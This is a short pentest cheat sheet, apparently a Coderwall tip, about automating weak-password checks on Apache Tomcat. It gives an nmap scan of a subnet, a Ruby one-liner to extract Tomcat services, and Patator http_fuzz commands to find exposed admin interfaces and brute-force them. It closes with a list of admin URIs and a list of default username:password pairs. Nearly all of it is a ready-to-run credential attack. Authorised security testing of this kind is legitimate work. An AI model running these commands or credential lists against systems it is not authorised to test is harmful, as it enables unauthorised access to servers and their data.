Automating checks for Tomcat weak passwords
Checking Tomcat installs for weak passwords is super laborious but often eventually rewarding part of any internal pentest. Here is a quick and nasty cheat sheet that uses Sebastien Macke's awesome Patator to automate the process.
First obtain a list Tomcat services from an nmap scan. Make sure the scan saved output in 'grepable' format (eg. -oG flag). For example:
nmap -sS -sV -sC -Pn -p80-89,443,8000-8999 192.168.0.0/24 -oG web-scanPull out any Tomcat instances from the nmap scan result (I am so sorry Regex/Ruby gods).
grep -i tomcat web-scan.gnmap | ruby -ne 'h = $_.match(/.*Host: ([\d\.]+)/)[1]; $_.scan(/(\d+)\/open\/tcp\/\/(ssl|http)[^,]+tomcat[^,]+\/,/i).each {|x| x[1].gsub!(/ssl/,"https"); puts "#{x[1]}:#{h}:#{x[0]}"};' > tomcat-services.txtYou will now have a list of Tomcat services in scheme:address:port format.
Use patator to quickly identify any Tomcat services that have Admin interfaces exposed (see end of page for Tomcat Admin URIs).
patator.py http_fuzz url=COMBO00://COMBO01:COMBO02/FILE1 0=tomcat-services.txt 1=tomcat-admin-uris.txt -x ignore:code=404 -x ignore:fgrep='administration web application is no longer installed by default' -l servicesAdmin interfaces are usually those returning 401 Unauthorized error messages. You should also manually check out the 200 OK responses as well.
Use grep to get a list of the management interfaces:
grep '401 Unauthorized' services/RESULTS.csv | cut -d',' -f6 > tomcat-admin-interfaces.txtYou will now have a list of Tomcat services in scheme:address:port:uri format.
Use patator to quickly check for weak passwords (see end of document for a list of default Tomcat passwords):
./patator.py http_fuzz url=COMBO00://COMBO01:COMBO02/COMBO03 user_pass=COMBO10:COMBO11 0=tomcat-admin-interfaces.txt 1=tomcat-account-combos.txt -x ignore:code=403 -x ignore:code=401 -l accountsPayday will be in the 200 OK responses!
Supporting Files
Common Admin Interfaces
A list of URIs for common Tomcat Admin interfaces (eg. tomcat-admin-uris.txt as used above).
status/
admin/
web-console/
jmx-console/
admin-console/
manager/html
web-console/Invoker
jmx-console/HtmlAdaptor
invoker/JMXInvokerServletCommon Default Passwords
List of common default passwords for Tomcat Admin interfaces (eg. tomcat-account-combos.txt as above). Credits to Chris Sullo.
admin:
admin:Password1
admin:admin
admin:j5Brn9
admin:password
admin:password1
admin:tomcat
both:tomcat
role1:role1
role1:tomcat
role:changethis
root:Password1
root:changethis
root:password
root:password1
root:r00t
root:root
root:toor
tomcat:
tomcat:Password1
tomcat:admin
tomcat:changethis
tomcat:password
tomcat:password1
tomcat:tomcatWritten by Jonathan Werrett
Related protips
Have a fresh tip? Share with Coderwall community!
